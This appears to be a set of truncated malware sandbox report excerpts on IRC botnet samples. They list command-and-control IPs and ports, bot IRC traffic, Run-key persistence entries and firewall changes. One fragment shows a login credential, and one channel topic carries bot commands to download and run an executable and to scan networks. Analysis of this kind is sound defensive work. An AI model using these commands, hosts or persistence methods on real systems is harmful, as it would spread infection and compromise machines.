Remote Host Port Number 184.106.215.31 6667 NICK {XPUSA874460} JOIN ##spam## PRIVMSG ##spam## :.::[MSN]::. Enviando Mensaje. PONG irc.priv8net.com USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA874460} -ix Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Services = “service.exe” so that service.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Windows Update =Read more...

Remote Host Port Number 66.187.108.124 81 NICK n[USA|XP|COMPUTERNAME]fgfbdpb USER n “” “lol” :n JOIN #biz# PONG 422 Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + WindowsDriverControl = “%AppData%C-76947-8457-2745wincdrsvn.exe” so that wincdrsvn.exe runs every time Windows starts File System Modifications * The following files were created in the system: # Filename(s) FileRead more...

NICK acelya USER ferda_54 “Cod” “dalga.co.cc” :Perihan^^^^ USERHOST acelya JOIN #x birtanem }. MODE #x NOTICE acelya :.VERSION mIRC v6.03 Khaled Mardam-Bey. NOTICE acelya :.version mIRC v6.16 Khaled Mardam-Bey. NOTICE IRC :.version mIRC v6.16 Khaled Mardam-Bey. NOTICE Version :.version mIRC v6.16 Khaled Mardam-Bey. PRIVMSG #x :Sahip , Sana Hizmete Haz.r.m ( v2 ) NICK Cansu4Read more...

Remote Host Port Number 173.1.102.35 81 NICK n[USA|XP|COMPUTERNAME]stnlxlc USER n “” “lol” :n JOIN #biz# PONG 422 JOIN #USA# (null) Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + WindowsDriverControl = “%AppData%C-76947-8457-2745winmsngrn.exe” so that winmsngrn.exe runs every time Windows starts File System Modifications * The following files were created in the system:Read more...

Remote Host Port Number 91.211.117.33 6667 NICK {XPUSA933915} JOIN ##spam## PONG irc.priv8net.com USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA933915} -ix Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Services = “service.exe” so that service.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Windows Update = “%Temp%service.exe” so that service.exe runsRead more...

Remote Host Port Number 66.187.108.125 81 NICK n[USA|XP|COMPUTERNAME]vdpunpf USER n “” “lol” :n JOIN #biz# PONG 422 JOIN #USA# (null) Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + WindowsDriverControl = “%AppData%C-76947-8457-2745winmsngrn.exe” so that winmsngrn.exe runs every time Windows starts File System Modifications * The following files were created in the system:Read more...

Remote Host Port Number 184.73.209.168 80 204.0.5.41 80 204.0.5.48 80 204.0.5.49 80 204.0.5.51 80 204.0.5.57 80 204.0.5.58 80 204.0.5.59 80 216.178.38.103 80 216.178.38.168 80 205.234.236.19 1234 PASS xxx NICK NEW-[USA|00|P|36443] USER XP-9032 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|36443] -ix JOIN #!nn! test PONG 22 MOTD * The data identified by the following URLs was then requestedRead more...

Remote Host Port Number 184.154.74.130 20 184.154.74.130 21 64.208.241.65 80 * The data identified by the following URLs was then requested from the remote web server: o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/DataScript.js o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/CodeScript.js o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/UIScript.js o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/ResourceScript.js o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/MasterScript.js USER uploader@demo.ymlook.com passwd !234567* Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsFirewall o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsFirewallDomainProfile o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsFirewallStandardProfileRead more...

DNS Lookup Host Name IP Address webpro569.redirectme.net 46.4.245.19 C&C Server: 46.4.245.19:6667 Server Password: Username: 0127 Nickname: {N}|DEU|XP|DELL-D3E62F7E26|970986 Channel: #webpro (Password: SRR569) Channeltopic: :oppp pecie of candy Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows Update Sched” = c:BotCrypted.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Windows Update Sched” = c:BotCrypted.exe HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “Windows Update Sched” = c:BotCrypted.exe Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFrameworkRead more...

Remote Host Port Number 174.139.92.250 4466,6764 USER waahud waahud waahud :cuipesjdhissjgkx NICK d[jLyAxEK]b MODE d[jLyAxEK]b +xi JOIN #balengor USERHOST d[jLyAxEK]b MODE #balengor +smntu PONG :binidic.net Now talking in #balengor Topic On: [ #balengor ] [ * exe 91.203.146.65 9933 ][ * ipscan s.s.s netapi -s ] Topic By: [ aessg ] Other details * TheRead more...